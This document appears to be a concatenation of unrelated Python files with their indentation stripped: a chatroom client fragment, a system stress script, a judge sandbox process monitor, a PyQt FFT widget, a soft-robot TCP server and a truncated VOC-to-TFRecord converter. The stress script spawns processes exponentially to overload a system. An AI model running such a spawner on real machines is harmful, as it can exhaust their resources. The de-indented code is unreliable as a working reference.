gui.update("Failed to connect the server.\n" +\
"Started retrying.")
gui.update("Retry connecting...")
time.sleep(5)
gui_flag = True
elif 4 > retry_count:
#logging.log('Retry connecting...')
#gui.update("Retry connecting...")
time.sleep(5)
gui_flag = True
elif retry_count == 5:
gui.update("Retry limit exceeded.\n" +\
"Unable to connect the server.\n" +\
"Program will automatically exit after 5 sec.")
time.sleep(5)
gui_flag = True
root.destroy()
logging.log('New thread has been initialized to fetch data from the server')
#threading._start_new_thread(network.genRSA, ())
rsa_thread = threading.Thread(target=network.genRSA, args=())
rsa_thread.start()
rsa_thread.join()
threading._start_new_thread(gui.get_msg,())
def main():
root = Tk() # instialize root window
root.title('ChatRoom')
threading._start_new_thread(connection_thread, (root,))
logging.log('Connection thread has been called')
root.mainloop()
logging.log('exiting main thread.')
logging.stop()
if __name__ == "__main__":
logging = Log(f_name='client_chatroom_' + datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))
opt = input('Enable logging? (y/N): ')
if opt in ('y', 'Y', 'yes', 'Yes', 'YES'):
# it will both save log_msg to a file and print to sys.stdout
logging.logging_flag = True
logging.validate_file()
main()
#TODO: client unable to detemine if server is alive after chat has been started.
|
system_stress.py
|
#!/usr/bin/env python
# Copyright (c) 2014-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from multiprocessing import Process, Lock, Value
import subprocess
import argparse
import socket
import fcntl
import struct
import timeit
P = 3298723423324
# See: http://stackoverflow.com/questions/24196932/how-can-i-get-the-ip-address-of-eth0-in-python
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def largest_prime_factor(n):
i = 2
while i * i <= n:
if n % i:
i += 1
else:
n //= i
return n
def init(e, po, n, j, l, count):
subprocess.call("echo 'hi' > /dev/null", shell=True)
netcat(e, po, "hello")
l.acquire()
try:
count.value = count.value + 1
finally:
l.release()
if j >= n:
largest_prime_factor(P)
return
procs = []
for i in xrange(n):
p = Process(target=init, args=(e, po, n, j + i + 1, l, count))
p.start()
procs.append(p)
for p in procs:
p.join()
# See: http://stackoverflow.com/questions/1908878/netcat-implementation-in-python
def netcat(hostname, port, content):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((hostname, int(port)))
s.sendall(content)
s.shutdown(socket.SHUT_WR)
s.close()
def expect(n):
return (2**n) * n
def main(args):
e = get_ip_address(args.i)
k = expect(args.n)
print ("Expecting %d (default shell) processes" % k)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((e, args.p))
c = Value('i', 0)
l = Lock()
for i in xrange(args.n):
init(e, args.p, args.n, i, l, c)
print("Executed %d (default shell) processes" % c.value)
return 0
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=("Place the system under stress."
" This will launch lots of shells and each will connect to a UDP socket."))
parser.add_argument("-n", type=int, default=4, help="Expotential intensity")
parser.add_argument("-i", required=True, help="Network interface for socket actions")
parser.add_argument("-p", type=int, default=9090, help="Local network UDP port")
args = parser.parse_args()
start = timeit.default_timer()
main(args)
print("Elapsed: " + str(timeit.default_timer() - start))
|
local.py
|
# vim:ts=4:sts=4:sw=4:expandtab
import datetime
import math
import os
import pathlib
import pwd
import resource
import signal
import tempfile
import time
import threading
import traceback
import kolejka.common.subprocess
from kolejka.judge import config
from kolejka.judge.result import Result
from kolejka.judge.systems.base import *
from kolejka.judge.parse import *
__all__ = [ 'LocalSystem' ]
def __dir__():
return __all__
page_size = int(os.sysconf("SC_PAGE_SIZE"))
clock_ticks = int(os.sysconf("SC_CLK_TCK"))
def proc_info(pid):
proc = pathlib.Path('/proc/'+str(pid))
with pathlib.Path('/proc/uptime').open() as uptime_file:
uptime = float(uptime_file.read().strip().split()[0])
try:
with ( proc / 'stat' ).open() as stat_file:
stat = stat_file.read().strip().split()
with ( proc / 'statm' ).open() as statm_file:
statm = statm_file.read().strip().split()
with ( proc / 'io' ).open() as io_file:
io = dict( [ (k.strip().lower(), int(v.strip())) for k,v in [ l.split(':') for l in io_file.read().strip().split('\n') ] ] )
result = dict()
result['ppid'] = int(stat[3])
result['cpu_user'] = int(stat[13]) / clock_ticks
result['cpu_sys'] = int(stat[14]) / clock_ticks
result['rss'] = int(statm[1]) * page_size
result['threads'] = int(stat[19])
result['read'] = io['rchar']
result['write'] = io['wchar']
result['real_time'] = uptime - int(stat[21]) / clock_ticks
return result
except:
return None
def proc_ppid(pid):
proc = pathlib.Path('/proc/'+str(pid))
try:
with ( proc / 'stat' ).open() as stat_file:
stat = stat_file.read().strip().split()
return int(stat[3])
except:
return None
def proc_pids():
proc = pathlib.Path('/proc')
return [ int(p.name) for p in proc.iterdir() if p.is_dir() and not p.is_symlink() and p.name.isdigit() ]
def proc_ppids():
result = dict()
for p in proc_pids():
pp = proc_ppid(p)
if pp is not None:
result[p] = pp
return result
def proc_children(pid):
return [ p for p in proc_pids() if proc_ppid(p) == pid ]
def proc_descendants(pid):
parents = proc_ppids()
children = dict([ (p,list()) for p in parents.values() ])
for child, parent in parents.items():
children[parent].append(child)
new_descendants = [ pid ]
all_descendants = []
while new_descendants:
active = new_descendants
new_descendants = []
for p in active:
all_descendants += children.get(p,[])
new_descendants += children.get(p,[])
return all_descendants
def monitor_safe_process(process, limits, result):
while True:
info = proc_info(process.pid)
if info is None:
break
result.update_memory(info['rss'])
result.update_real_time(info['real_time'])
result.update_cpu_time(info['cpu_user'] + info['cpu_sys'])
if limits.cpu_time and result.cpu_time > limits.cpu_time:
process.kill()
if limits.real_time and result.real_time > limits.real_time:
process.kill()
if limits.memory and result.memory > limits.memory:
process.kill()
time.sleep(0.05)
def end_process(process):
try:
pids = proc_descendants(process.pid)
try:
process.terminate()
time.sleep(0.1)
except:
pass
for pid in pids:
try:
os.kill(pid)
except:
pass
while True:
pids = proc_descendants(process.pid)
if pids:
for pid in pids:
try:
os.kill(pid)
except:
pass
else:
break
except:
pass
def monitor_process(process, limits, result):
real_time = dict()
cpu_time = dict()
while True:
info = proc_info(process.pid)
if info is None:
break
memory = info['rss']
real_time[process.pid] = info['real_time']
cpu_time[process.pid] = info['cpu_user'] + info['cpu_sys']
infos = dict([ (pid, proc_info(pid)) for pid in proc_descendants(process.pid) ])
for pid, info in infos.items():
if info is None:
continue
memory += info['rss']
real_time[pid] = max(real_time.get(pid,0), info['real_time'])
cpu_time[pid] = max(cpu_time.get(pid,0), info['cpu_user'] + info['cpu_sys'])
result.update_memory(memory)
result.update_real_time(sum(real_time.values()))
result.update_cpu_time(sum(cpu_time.values()))
if limits.cpu_time and result.cpu_time > limits.cpu_time:
end_process(process)
if limits.real_time and result.real_time > limits.real_time:
end_process(process)
if limits.memory and result.memory > limits.memory:
end_process(process)
time.sleep(0.05)
class LocalSystem(SystemBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.output_directory.mkdir(parents=True, exist_ok=True)
def get_superuser(self):
return os.getuid() == 0
def get_current_user(self):
return pwd.getpwuid(os.getuid()).pw_name
def get_resources(self, limits):
resources = dict()
for limit in [
resource.RLIMIT_CORE,
resource.RLIMIT_CPU,
# resource.RLIMIT_FSIZE,
resource.RLIMIT_DATA,
resource.RLIMIT_STACK,
# resource.RLIMIT_RSS,
# resource.RLIMIT_NPROC,
# resource.RLIMIT_NOFILE,
# resource.RLIMIT_MEMLOCK,
# resource.RLIMIT_AS,
# resource.RLIMIT_MSGQUEUE,
# resource.RLIMIT_NICE,
# resource.RLIMIT_RTPRIO,
# resource.RLIMIT_RTTIME,
# resource.RLIMIT_SIGPENDING,
]:
resources[limit] = (resource.RLIM_INFINITY, resource.RLIM_INFINITY)
resources[resource.RLIMIT_CORE] = (0,0)
if limits.cpu_time:
seconds = int(math.ceil((limits.cpu_time + parse_time('1s')).total_seconds()))
resources[resource.RLIMIT_CPU] = (seconds, seconds)
if limits.memory:
memory = int(math.ceil(limits.memory + parse_memory('1mb')))
resources[resource.RLIMIT_DATA] = (limits.memory,limits.memory)
return resources
def execute_safe_command(self, command, stdin_path, stdout_path, stdout_append, stdout_max_bytes, stderr_path, stderr_append, stderr_max_bytes, environment, work_path, user, group, limits, result):
stdin_file = self.read_file(stdin_path)
stdout_file, stdout_writer = self.file_writer(stdout_path, stdout_append, max_bytes=stdout_max_bytes)
stderr_file, stderr_writer = self.file_writer(stderr_path, stderr_append, max_bytes=stderr_max_bytes)
writers = (stdout_writer, stderr_writer)
change_user, change_group, change_groups = self.get_user_group_groups(user, group)
resources = self.get_resources(limits)
#resources[resource.RLIMIT_NPROC] = (1,1) #This is a very bad idea, read notes in man execv on EAGAIN
process = kolejka.common.subprocess.start(
command,
user=change_user,
group=change_group,
groups=change_groups,
resources=resources,
stdin=stdin_file,
stdout=stdout_file,
stderr=stderr_file,
env=environment,
cwd=work_path,
)
stdin_file.close()
stdout_file.close()
stderr_file.close()
monitoring_thread = threading.Thread(target=monitor_safe_process, args=(process, limits, result))
monitoring_thread.start()
returncode = process.wait()
monitoring_thread.join()
for writer in writers:
writer.join()
result.set_returncode(returncode)
def start_command(self, command, stdin_path, stdout_path, stdout_append, stdout_max_bytes, stderr_path, stderr_append, stderr_max_bytes, environment, work_path, user, group, limits):
stdin_file = self.read_file(stdin_path)
stdout_file, stdout_writer = self.file_writer(stdout_path, stdout_append, max_bytes=stdout_max_bytes)
stderr_file, stderr_writer = self.file_writer(stderr_path, stderr_append, max_bytes=stderr_max_bytes)
writers = (stdout_writer, stderr_writer)
change_user, change_group, change_groups = self.get_user_group_groups(user, group)
resources = self.get_resources(limits)
process = kolejka.common.subprocess.start(
command,
user=change_user,
group=change_group,
groups=change_groups,
resources=resources,
stdin=stdin_file,
stdout=stdout_file,
stderr=stderr_file,
env=environment,
cwd=work_path,
)
stdin_file.close()
stdout_file.close()
stderr_file.close()
result = Result()
monitoring_thread = threading.Thread(target=monitor_process, args=(process, limits, result))
monitoring_thread.start()
return (process, monitoring_thread, result, writers)
def terminate_command(self, process):
process, monitoring_thread, monitor_result, writers = process
process.terminate()
for writer in writers:
writer.join()
def wait_command(self, process, result):
process, monitoring_thread, monitor_result, writers = process
completed = kolejka.common.subprocess.wait(process)
monitoring_thread.join()
for writer in writers:
writer.join()
result.update_memory(monitor_result.memory)
result.update_real_time(monitor_result.real_time)
result.update_cpu_time(monitor_result.cpu_time)
result.update_real_time(completed.time)
result.set_returncode(completed.returncode)
|
mplsmall_FFT.py
|
from PyQt5.QtWidgets import *
import matplotlib.pyplot as plt
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from PyQt5 import QtCore
import threading
from PyQt5.Qt import QPoint, QRect
class mplsmall_FFT(QWidget):
def __init__(self,parent=None):
QWidget.__init__(self)
self.setMaximumHeight(60)
self.verticalLayout = QVBoxLayout(self)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.scrollArea = QScrollArea(self)
self.scrollArea.setWidgetResizable(False)
self.scrollArea.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.scrollArea.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.figure = plt.figure() #QWidget //FigureCanvas//Figure// subplot
self.axes = self.figure.add_subplot(1, 1, 1)
self.canvas = FigureCanvas(self.figure) # FigureCanvas//Figure// called canvas
self.figure.set_facecolor("black")
self.scrollArea.setSizePolicy(QSizePolicy.Minimum,QSizePolicy.Maximum)
self.scrollArea.setContentsMargins(0, 0, 0, 0)
self.scrollArea.setStyleSheet("border:0px;padding:0px")
self.scrollArea.setWidget(self.canvas)
self.verticalLayout.addWidget(self.scrollArea)
self.canvas.mpl_connect('draw_event',self.On_Canvas_drawn)
self.plot_list=[]
self.line_list=[]
self.canvas.setFocusPolicy( QtCore.Qt.ClickFocus )
#self.canvas.mpl_connect('key_press_event', self.mpEvent)
self.canvas.mpl_connect('button_press_event', self.mouse_pressed)
self.canvas.mpl_connect('button_release_event', self.mouse_released)
self.canvas.mpl_connect('motion_notify_event',self.mouse_in_motion)
self.is_clicked=False
self.green_clicked=False
self.rescale_done_by_selection=False
def init_fig(self,parent):
self.main=parent
#self.axes = self.figure.add_subplot(1, 1, 1)
self.axes.set_in_layout(False)
self.axes.patch.set_facecolor('xkcd:black')
self.axes.set_yticklabels([])
self.figure.tight_layout(pad=0, w_pad=None, h_pad=None)
self.fft_zoomwin=self.main.fftW.zoomwin
#####################################events############################################
def resizeEvent(self,event):
QWidget.resizeEvent(self, event)
print("small Win resized")
def showEvent(self, event):
QWidget.showEvent(self, event)
print("shown_small")
def On_Canvas_drawn(self,draw_event):
print("Draw_evt_on FFT_small")
def mouse_pressed(self, e):
print("pressed")
#######################################PLOT#################################################
def addplot_(self,x_,y_,ch_color,xlimit,ylimit):
plot_ = self.axes.plot(x_,y_,color=ch_color)
self.axes.set_yticklabels([])
self.axes.set(xlim=xlimit,ylim=ylimit,autoscale_on=False)
self.plot_list.append(plot_)
self.line_list.append(plot_[0])
self.fft_zoomwin.addplot_(x_,y_,ch_color,xlimit)
def plot_refresh(self):
draw_thrd=threading.Thread(target=self.canvas.draw_idle()).start()
self.fft_zoomwin.plot_refresh()
def rem_plot_0(self):
self.plot_list[0][0].remove()
self.plot_list=[]
self.line_list=[]
self.fft_zoomwin.rem_plot_0()
def edit_plot(self,plot_num,x_,y_,ch_color,x_limit):
self.plot_list[plot_num][0].remove()
plot_=self.axes.plot(x_,y_, color=ch_color)
self.plot_list[plot_num]=plot_
self.line_list[plot_num]=plot_[0]
self.axes.set_xlim(x_limit[0],x_limit[1])
print("small limit:",x_limit[0],x_limit[1])
self.fft_zoomwin.edit_plot(plot_num,x_,y_,ch_color,x_limit)
def change_color(self,lineno,col):
self.axes.get_lines()[lineno].set_color(col)
self.fft_zoomwin.change_color(lineno,col)
def mouse_pressed(self, e):
if self.main.fftW.small_view_start_pos<e.x and e.x<self.main.fftW.small_view_end_pos:
print("clk_inside")
self.click_pos=e.x
self.Scroll_val_at_clicked=self.main.FFT_Widget.scrollArea.horizontalScrollBar().value()
main_c_width=self.main.FFT_Widget.canvas.size().width()
self.width_ratio=main_c_width/self.canvas.size().width()
self.is_clicked=True
print("CLICKED_VAL:",self.Scroll_val_at_clicked)
elif e.x>self.main.fftW.CoordMin and e.x<self.main.fftW.CoordMax and self.main.fftW.rescalex_Out_ranged:
self.canvas_width=self.canvas.size().width()
self.click_pos=e.x
self.green_clicked=True
print("pressed")
def mouse_released(self,e):
self.is_clicked=False
if self.green_clicked==True:
mid_pt=((self.main.fftW.CoordMin+self.main.fftW.CoordMax)/2)+self.change_in_pos###start_pos+(end_pos-start_pos)/2
self.reseted_mid=self.main.fftW.fftsmall_px2pt.transform((mid_pt,0))[0]
self.green_clicked=False
self.rescale_done_by_selection=True
if hasattr(self, "scale_thread")==True:
if self.scale_thread.is_alive():
self.scale_thread.cancel()
self.scale_thread=threading.Thread(target=self.main.fftW.rescale_x)
self.scale_thread.start()
def mouse_in_motion(self,e):
if self.is_clicked==True:
print("CLICKED_VAL:",self.Scroll_val_at_clicked,"pos:",e.x,"change_in_pos:",(e.x-self.click_pos))
change_in_pos=(e.x-self.click_pos)*self.width_ratio
self.main.FFT_Widget.scrollArea.horizontalScrollBar().setValue(self.Scroll_val_at_clicked+change_in_pos)
elif self.green_clicked==True:
change_in_pos=(e.x-self.click_pos)
if (self.main.fftW.CoordMin+change_in_pos)>0 and (self.main.fftW.CoordMax+change_in_pos)<self.canvas_width:
self.change_in_pos=change_in_pos
self.rubberbands_draw_shifted(self.change_in_pos)
############################################Redraw_Rubberbands########################################
def rubberbands_draw_shifted(self,ch_in_pos):
self.main.fftW.rubberBand_red.hide()
self.main.fftW.rubberBand_red1.hide()
self.main.fftW.rubberBand.setGeometry(QRect(QPoint(int(self.main.fftW.CoordMin+self.change_in_pos),0),QPoint(int(self.main.fftW.small_view_start_pos+self.change_in_pos),60)))
self.main.fftW.rubberBand1.setGeometry(QRect(QPoint(int(self.main.fftW.small_view_end_pos+self.change_in_pos),0),QPoint(int(self.main.fftW.CoordMax+self.change_in_pos),60)))
#changelog
#changed on plot rescaled to main plot when rescaled out of range which is unwanted in case of smallplot
|
baseSoftRobot.py
|
import multiprocessing
import socket
import struct
from ctypes import c_bool
import time
#---------------------------------------------------------------------
#- main SoftRC class -------------------------------------------------
class baseSoftRobot:
def __init__(self,nSensors,port):
self.nSensors = nSensors
## Set up TCP server
# Set up socket
host = ''
server_address = (host, port)
self.clients = []
self.control_processes = []
self.comm_processes = []
self.clients_addresses = []
self.buffersize = 8*self.nMotors
self.socket_TCP = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket_TCP.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket_TCP.bind(server_address)
## Multiprocessing
if self.nSensors > 0:
self.sensorsUpdated = multiprocessing.Array(c_bool,[False]*self.nSensors)
self.stopFlag = multiprocessing.Value(c_bool,False)
print("port: ",self.port)
print("i2c: ",self.port)
#---------------------------------------------------------------------
#- main SoftRC clas -------------------------------------------------
def waitForClient(self):
"""Automatically accept one incoming client"""
self.socket_TCP.listen(1)
print("TCP server is running. Waiting for client...")
client, client_address = self.socket_TCP.accept()
print("Client ",client_address," connected. Comm's ready!")
client.settimeout(1)
time.sleep(0.9)
self.clients.append(client)
self.clients_addresses.append(client_address)
def repeatedlySend(self):
"""Send data to all clients until stopFlag == True"""
while not self.stopFlag.value:
if all(self.sensorsUpdated):
try:
data = struct.pack('d'*len(self.sensorsValues),*self.sensorsValues)
for client in self.clients:
client.sendall(data)
for i in range(self.nSensors):
self.sensorsUpdated[i] = False
except Exception as e:
print('Send failed')
print(e)
self.stopFlag.value = True
break
self.socket_TCP.close()
def receive(self):
while not self.stopFlag.value:
try:
raw = self.clients[0].recv(self.buffersize)
# print('Data received')
unpackedData = struct.unpack('d'*int(self.buffersize/8),raw)
for i in range(int(self.buffersize/8)):
self.motorsValues[i]=unpackedData[i]
except Exception as e:
print('Error in receive: ',e)
self.stopFlag.value = True
self.socket_TCP.close()
def readSensors(self):
raise NotImplementedError("readSensors must be implemented in the child class")
def controlActuators(self):
raise NotImplementedError("controlActuators must be implemented in the child class")
def createProcesses(self):
## Processes to read sensors
for i in range(self.nSensors):
self.control_processes.append(multiprocessing.Process(target=self.readSensors, args=(i,)))
## Process to control the motors
self.control_processes.append(multiprocessing.Process(target=self.controlActuators))
## Processes for TCP/IP comm
self.comm_processes.append(multiprocessing.Process(target=self.repeatedlySend))
self.comm_processes.append(multiprocessing.Process(target=self.receive))
def run_control(self):
for p in self.control_processes:
p.start()
def run_comm(self):
for p in self.comm_processes:
p.start()
def run(self):
self.run_control()
self.waitForClient()
self.run_comm()
def waitForProcesses(self):
for p in self.processes:
p.join()
#---------------------------------------------------------------------
#- base template for sensor class ---------------------------------------
class baseSensor:
def __init__(self, sensorInstance):
self.instance = sensorInstance
def readSensor(self):
raise NotImplementedError("readSensor must be implemented in the child class")
|
convert_tfrecords_mislabelled.py
|
# Copyright 2018 Changan Wang
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import xml.etree.ElementTree as xml_tree
import numpy as np
import six
import tensorflow as tf
import dataset_common
'''How to organize your dataset folder:
VOCROOT/
|->VOC2007/
| |->Annotations/
| |->ImageSets/
| |->...
|->VOC2012/
| |->Annotations/
| |->ImageSets/
| |->...
|->VOC2007TEST/
| |->Annotations/
| |->...
'''
tf.app.flags.DEFINE_string('dataset_directory', '.',
'All datas directory')
tf.app.flags.DEFINE_string('train_splits', 'VOC2007, VOC2012',
'Comma-separated list of the training data sub-directory')
tf.app.flags.DEFINE_string('validation_splits', 'VOC2007TEST',
'Comma-separated list of the validation data sub-directory')
tf.app.flags.DEFINE_string('output_directory', './tfrecords',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 16,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 16,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
RANDOM_SEED = 180428
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_list_feature(value):
"""Wrapper for inserting a list of bytes features into Example proto.
"""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if isinstance(value, six.string_types):
value = six.binary_type(value, encoding='utf-8')
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_name, image_buffer, bboxes, labels, labels_text,
difficult, truncated, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
bboxes: List of bounding boxes for each image
labels: List of labels for bounding box
labels_text: List of labels' name for bounding box
difficult: List of ints indicate the difficulty of that bounding box
truncated: List of ints indicate the truncation of that bounding box
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
ymin = []
xmin = []
ymax = []
xmax = []
for b in bboxes:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([ymin, xmin, ymax, xmax], b)]
# pylint: enable=expression-not-assigned
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/channels': _int64_feature(channels),
'image/shape': _int64_feature([height, width, channels]),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature(labels),
'image/object/bbox/label_text': _bytes_list_feature(labels_text),
'image/object/bbox/difficult': _int64_feature(difficult),
'image/object/bbox/truncated': _int64_feature(truncated),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(image_name.encode('utf8')),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _find_image_bounding_boxes(directory, cur_record):
"""Find the bounding boxes for a given image file.
Args:
directory: string; the path of all datas.
cur_record: list of strings; the first of which is the sub-directory of cur_record, the second is the image filename.
Returns:
bboxes: List of bounding boxes for each image.
labels: List of labels for bounding box.
labels_text: List of labels' name for bounding box.
difficult: List of ints indicate the difficulty of that bounding box.
truncated: List of ints indicate the truncation of that bounding box.
Notes:
directory is just the input dir
e.g. '.'
cur_record is a tuple containing the current record folder and current record image
e.g. ('VOC2012', '2012_002167.jpg')
"""
anna_file = os.path.join(directory, cur_record[0], 'Annotations', cur_record[1].replace('jpg', 'xml'))
tree = xml_tree.parse(anna_file)
root = tree.getroot()
# Image shape.
size = root.find('size')
shape = [int(size.find('height').text),
int(size.find('width').text),
int(size.find('depth').text)]
# Find annotations.
bboxes = []
labels = []
labels_text = []
difficult = []
truncated = []
num_classes = len(dataset_common.VOC_LABELS_reduced)
for obj in root.findall('object'):
label = obj.find('name').text
if label in dataset_common.VOC_LABELS_reduced:
label_id = int(dataset_common.VOC_LABELS_reduced[label][0])
label_text = label.encode('ascii')
else:
label_id = num_classes
label_text = 'background'.encode('ascii')
labels.append(label_id)
labels_text.append(label_text)
isdifficult = obj.find('difficult')
if isdifficult is not None:
difficult.append(int(isdifficult.text))
else:
difficult.append(0)
istruncated = obj.find('truncated')
if istruncated is not None:
truncated.append(int(istruncated.text))
else:
truncated.append(0)
bbox = obj.find('bndbox')
bboxes.append((float(bbox.find('ymin').text) / shape[0],
float(bbox.find('xmin').text) / shape[1],
float(bbox.find('ymax').text) / shape[0],
float(bbox.find('xmax').text) / shape[1]
))
return bboxes, labels, labels_text, difficult, truncated
def _process_image_files_batch(coder, thread_index, ranges, name, directory, all_records, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
directory: string; the path of all datas
all_records: list of string tuples; the first of each tuple is the sub-directory of the record, the second is the image filename.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
cur_record = all_records[i]
filename = os.path.join(directory, cur_record[0], 'JPEGImages', cur_record[1])
bboxes, labels, labels_text, difficult, truncated = _find_image_bounding_boxes(directory, cur_record)
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, cur_record[1], image_buffer, bboxes, labels, labels_text,
difficult, truncated, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, directory, all_records, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
directory: string; the path of all datas
all_records: list of string tuples; the first of each tuple is the sub-directory of the record, the second is the image filename.
num_shards: integer number of shards for this data set.
"""
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(all_records), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, directory, all_records, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(all_records)))
sys.stdout.flush()
def _process_dataset(name, directory, all_splits, num_shards):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
